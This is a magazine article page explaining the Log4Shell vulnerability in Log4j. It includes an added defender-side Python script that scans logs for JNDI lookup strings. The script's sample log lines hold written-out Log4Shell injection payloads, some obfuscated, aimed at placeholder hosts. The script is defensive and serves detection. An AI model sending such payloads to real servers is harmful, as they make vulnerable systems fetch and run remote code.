Page 115 - Cyber Defense eMagazine Special RSA Conference Annual Edition for 2022

Analysing the true threat of Log4j


            By Tom McVey, Sales Engineer EMEA, Menlo Security



In December 2021 the cybersecurity industry could be found reflecting on another difficult year, defined by further spikes in both the sophistication and volume of threats used by attackers.

Following on from a similar pattern in 2020, attackers continued to capitalise on growing digital footprints and new vulnerabilities – a trend that has only continued to accelerate since the pandemic first induced a rapid increase in digitalisation efforts.

Amidst such reflections, Log4Shell emerged as one of the most threatening vulnerabilities facing companies to date.

Log4Shell is a weak point that was discovered in the Log4j Java logging library (CVE-2021-44228). Log4j is a widespread piece of software typically used to record events such as errors and routine system operations. The 404 error message that is received when clicking on a bad link is one such example of Log4j in action, both telling the user that the webpage doesn’t exist and recording the event in a log.

Log4Shell works by abusing a specific feature in Log4j that allows users to specify custom code for formatting a log message. The challenge lies in the fact that this code can be used for more than just formatting log messages. Indeed, Log4j allows third-party servers to submit software code that can perform all kinds of actions on the targeted computer, opening the door to a range of nefarious activities.
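A defender-side illustration of the feature described above, added here and not part of the original article: in logged text the formatting feature appears as `${...}` lookup expressions, and the lookup that reaches out to a third-party server is the `jndi` one. The function names, sample log lines and host names are constructed for this example, and the substitution logic only approximates Log4j's closely enough for log triage.

```python
import re

# Innermost ${...} expression: no braces inside, so nested ones resolve first.
INNER = re.compile(r"\$\{([^{}]*)\}")

def has_jndi_lookup(line, max_rounds=10):
    """True if the text, once nested lookups are collapsed, contains ${jndi:...}."""
    found = False

    def resolve(match):
        nonlocal found
        expr = match.group(1)
        prefix, _, rest = expr.partition(":")
        name = prefix.strip().lower()
        if name == "jndi":               # lookup that contacts a remote naming service
            found = True
            return ""
        if name in ("lower", "upper"):   # case-changing lookups can hide single letters
            return rest
        if ":-" in expr:                 # ${key:-default} falls back to the default
            return expr.split(":-", 1)[1]
        return ""                        # any other lookup: value unknown, drop it

    for _ in range(max_rounds):          # bounded so deep nesting cannot stall the scan
        collapsed = INNER.sub(resolve, line)
        if found or collapsed == line:
            break
        line = collapsed
    return found

# Constructed sample log lines (hosts use the reserved .invalid TLD).
SAMPLE_LOG = [
    '2021-12-10 09:14:02 WARN 404 /missing.html ua="Mozilla/5.0"',
    '2021-12-10 09:14:05 WARN 404 /a ua="${jndi:ldap://host.example.invalid/a}"',
    '2021-12-10 09:14:09 WARN 404 /b ua="${${lower:j}ndi:${lower:l}dap://host.example.invalid/a}"',
    '2021-12-10 09:14:11 INFO login user=${env:USER:-guest}',
]

def flag_lines(lines):
    """Return 1-based numbers of the lines that contain a jndi lookup."""
    return [n for n, text in enumerate(lines, 1) if has_jndi_lookup(text)]

if __name__ == "__main__":
    for n in flag_lines(SAMPLE_LOG):
        print(f"line {n}: jndi lookup present -> review host and patch level")
```

A hit in a log shows only that the string was received; whether it was acted on depends on the Log4j version that processed it.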











































